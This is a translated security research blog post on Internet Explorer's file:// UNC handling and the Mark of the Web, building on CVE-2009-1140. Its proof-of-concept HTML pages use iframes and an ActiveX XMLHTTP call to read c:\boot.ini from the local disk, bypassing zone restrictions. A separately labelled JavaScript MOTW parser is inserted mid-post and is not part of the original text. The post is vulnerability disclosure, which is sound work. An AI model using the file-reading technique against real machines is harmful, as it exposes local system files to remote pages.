5up3rh3iblog
In the previous blog post "8-mounted CVE-2009-1140", CVE-2009-1140 and the local file probing problem reported by 80sec were discussed [details of that issue have been published on wooyun].
Judging from MS's patch for CVE-2009-1140 and its response to the 80sec vulnerability report, MS views CVE-2009-1140 as a problem of the object tag parsing non-HTML files:
<object data="index.dat" type="text/html" width="100%" height="50"></object>
[Looking at the vulnerability from MS's perspective, it should have been patched at least 10 years ago (MS00-055)...]
The file probing issue reported by 80sec is considered to be: "This problem is caused by incorrect handling of external source files referenced by IE." In addition, the key calling method in the above vulnerability is file://uncpath, yet that is not considered a "vulnerability"....
Since the file://uncpath method is not considered a "vulnerability", let's test it as follows:
Save the file c:\test.htm:
<html>
<head>
<title>test.htm</title>
</head>
<body>
test.htm
</body>
</html>
Save the file c:\test1.htm:
<html>
<head>
<title>test1.htm</title>
<!-- saved from url=(0014)about:internet -->
</head>
<body>
test1.htm
</body>
</html>
Save the file c:\test2.htm:
<html>
<head>
<title>test2.htm</title>
<!-- saved from url=(0016)http://localhost -->
</head>
<body>
test2.htm
</body>
</html>
Save the file http://192.168.1.101/ie7/iframe.htm:
<html>
<head>
<title>iframe.htm</title>
</head>
<body>
file://127.0.0.1/c$/test.htm<br>
<iframe src="file://127.0.0.1/c$/test.htm"></iframe>
<br>file://c:/test.htm<br>
<iframe src="file://c:/test.htm"></iframe>
<br>file://c:/test1.htm<br>
<iframe src="file://c:/test1.htm"></iframe>
<br>file://c:/test2.htm<br>
<iframe src="file://c:/test2.htm"></iframe>
</body>
</html>
Let's look at the "<!-- saved from url=(0014)about:internet -->" comment; details: http://msdn.microsoft.com/ch/library/ms537628%28VS.85%29.aspx
The Mark of the Web (MOTW) is a feature of Windows Internet Explorer that enhances security by enabling Internet Explorer to force Web pages to run in the security zone of the location the page was saved from, as long as that security zone is more restrictive than the Local Machine zone, instead of the Local Machine zone. The role of the MOTW is more prominent with Microsoft Internet Explorer 6 for Windows XP Service Pack 2 (SP2) because of increased security restrictions in the Local Machine zone. When you are developing Web content, the MOTW enables you to test your active HTML documents in the security zone where you intend the pages to run. Adding the MOTW to your Web pages also enables you to fully test their compatibility with users' security settings.
This is a security policy introduced with IE6 SP2: it lets you specify the zone an HTML file is treated as coming from. test1.htm is marked as coming from the Internet zone.
From the above access results, we can see that the file://c:/ method can access test1.htm and test2.htm, which carry a MOTW for the Internet zone (about:internet) and the local intranet zone (http://localhost) respectively, but not test.htm, which has no MOTW. In addition, access via the file://unc method succeeds.
If the files are merely loaded, you may think this brings no security issue, so let's continue the test:
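To make the MOTW rule concrete, here is an added example (not code from the original post) that parses the "saved from url=(NNNN)URL" comment out of an HTML file, checks that the declared character count matches the URL as the MSDN format requires, and reports the zone the file asks to run in. The zone mapping (about:internet to Internet, http://localhost or a dotless host to Local intranet, a dotted host to Internet, no mark to Local Machine) and the treatment of a mark with a wrong count as absent are this example's assumptions; the sample files are constructed to mirror test.htm, test1.htm and test2.htm above.

```javascript
// Added example (not from the original post): parse an HTML file's Mark of the
// Web comment and report which IE security zone it asks for.
// MOTW format (per MSDN): <!-- saved from url=(NNNN)URL -->, where NNNN is the
// character count of URL, zero-padded to four digits.
const MOTW_RE = /<!--\s*saved from url=\((\d{4})\)(\S+?)\s*-->/i;

function zoneFor(url) {
  // Zone mapping used by this example (assumption, following IE defaults):
  // about:internet is the documented placeholder for the Internet zone;
  // http(s)://localhost and dotless hostnames are Local intranet;
  // any other dotted host is Internet.
  if (url.toLowerCase() === 'about:internet') return 'Internet';
  const m = /^https?:\/\/([^/:]+)/i.exec(url);
  if (m) {
    const host = m[1].toLowerCase();
    if (host === 'localhost' || !host.includes('.')) return 'Local intranet';
    return 'Internet';
  }
  return 'Unknown';
}

function parseMotw(html) {
  const m = MOTW_RE.exec(html);
  if (!m) {
    // No mark: a local file runs in the Local Machine zone.
    return { present: false, valid: false, url: null, zone: 'Local Machine' };
  }
  const declared = parseInt(m[1], 10);
  const url = m[2];
  // A count that does not match the URL length is a malformed mark;
  // this example treats it as if no mark were present (assumption).
  const valid = declared === url.length;
  return { present: true, valid, url, zone: valid ? zoneFor(url) : 'Local Machine' };
}

// Constructed sample files mirroring the post's test.htm, test1.htm and
// test2.htm, plus one with a deliberately wrong character count.
const SAMPLES = {
  'test.htm': '<html><head><title>test.htm</title></head><body>test.htm</body></html>',
  'test1.htm': '<html><head><title>test1.htm</title>\n<!-- saved from url=(0014)about:internet -->\n</head><body>test1.htm</body></html>',
  'test2.htm': '<html><head><title>test2.htm</title>\n<!-- saved from url=(0016)http://localhost -->\n</head><body>test2.htm</body></html>',
  'bad.htm': '<html><head><!-- saved from url=(0099)about:internet --></head><body></body></html>',
};

function classifyAll(samples) {
  const out = {};
  for (const [name, html] of Object.entries(samples)) out[name] = parseMotw(html);
  return out;
}

for (const [name, r] of Object.entries(classifyAll(SAMPLES))) {
  const mark = r.present ? `MOTW ${r.valid ? 'valid' : 'INVALID'} ${r.url}` : 'no MOTW';
  console.log(`${name}: ${mark} => ${r.zone}`);
}
```

Run it with node; test1.htm and test2.htm come out as Internet and Local intranet, test.htm has no mark and stays in the Local Machine zone, and bad.htm shows how a mark whose count does not match its URL is flagged rather than trusted.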
Save the file c:\xhr.htm:
<html>
<head>
<title>xhr.htm</title>
<!-- saved from url=(0014)about:internet -->
</head>
<body>
<script>
// Relative "boot.ini" resolves against the page location, i.e. c:\boot.ini
// when the page is loaded as c:\xhr.htm.
var xmlhttp = new ActiveXObject("Msxml2.XMLHTTP.3.0");
xmlhttp.open("GET", "boot.ini", false);
xmlhttp.send();
document.write(xmlhttp.responseText);
</script>
</body>
</html>
Save the file http://192.168.1.101/ie7/iframe-1.htm:
<html>
<head>
<title>iframe-1.htm</title>
</head>
<body>
file://127.0.0.1/c$/xhr.htm<br>
<iframe src="file://127.0.0.1/c$/xhr.htm"></iframe>
<br>file://c:/xhr.htm<br>
<iframe src="file://c:/xhr.htm"></iframe>
</body>
</html>
Obviously, through file://unc, xmlhttp reads c:\boot.ini, while through file://c:/ access is denied. Going by MS's handling approach from the earlier article, shouldn't this be regarded as an xmlhttp "vulnerability"???